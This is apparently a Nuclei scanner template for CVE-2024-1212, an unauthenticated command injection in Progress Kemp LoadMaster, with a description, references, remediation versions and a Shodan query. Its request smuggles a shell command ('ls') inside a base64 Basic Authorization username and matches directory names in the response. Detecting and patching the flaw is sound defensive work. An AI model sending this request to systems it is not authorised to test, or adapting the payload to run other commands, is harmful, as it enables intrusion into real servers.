Description
Unauthenticated remote attackers can access the system through the LoadMaster management interface, enabling arbitrary system command execution.
Unauthenticated remote attackers can access the system through the LoadMaster management interface, enabling arbitrary system command execution.
id: CVE-2024-1212
info:
name: Progress Kemp LoadMaster - Command Injection
author: DhiyaneshDK
severity: critical
description: |
Unauthenticated remote attackers can access the system through the LoadMaster management interface, enabling arbitrary system command execution.
impact: |
Unauthenticated attackers can execute arbitrary system commands through the LoadMaster management interface, leading to complete system compromise.
remediation: |
Upgrade to LoadMaster versions 7.2.59.2, 7.2.54.8, or 7.2.48.10 depending on your current version.
reference:
- https://rhinosecuritylabs.com/research/cve-2024-1212unauthenticated-command-injection-in-progress-kemp-loadmaster
- https://support.kemptechnologies.com/hc/en-us/articles/23878931058445-LoadMaster-Security-Vulnerability-CVE-2024-1212
- https://support.kemptechnologies.com/hc/en-us/articles/24325072850573-Release-Notice-LMOS-7-2-59-2-7-2-54-8-7-2-48-10-CVE-2024-1212
- https://nvd.nist.gov/vuln/detail/CVE-2024-1212
- https://freeloadbalancer.com/
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H
cvss-score: 10
cve-id: CVE-2024-1212
cwe-id: CWE-78
epss-score: 0.95388
epss-percentile: 0.99865
metadata:
verified: true
max-request: 1
shodan-query: html:"LoadMaster"
tags: cve,cve2024,progress,rce,loadmaster,kev,vkev,vuln
http:
- method: GET
path:
- "{{BaseURL}}/access/set?param=enableapi&value=1"
headers:
Authorization: "Basic JztsczsnOmRvZXNub3RtYXR0ZXI="
matchers-condition: and
matchers:
- type: word
part: body
words:
- "bin"
- "mnt"
- "WWW-Authenticate: Basic"
condition: and
- type: status
status:
- 200
# digest: 4b0a00483046022100f2cc140dcc351a690472689ed7cb6ad3ab466bc085c38829bc9499a83a18e673022100b819e8ba8c8e29e2c946fc9cd6941e9509e18647631e1cc8de03bf3fa9fa99bf:922c64590222798bb761d5b6d8e72950
# Visit https://trap.biu.life/ to view exploit trends for this vulnerability.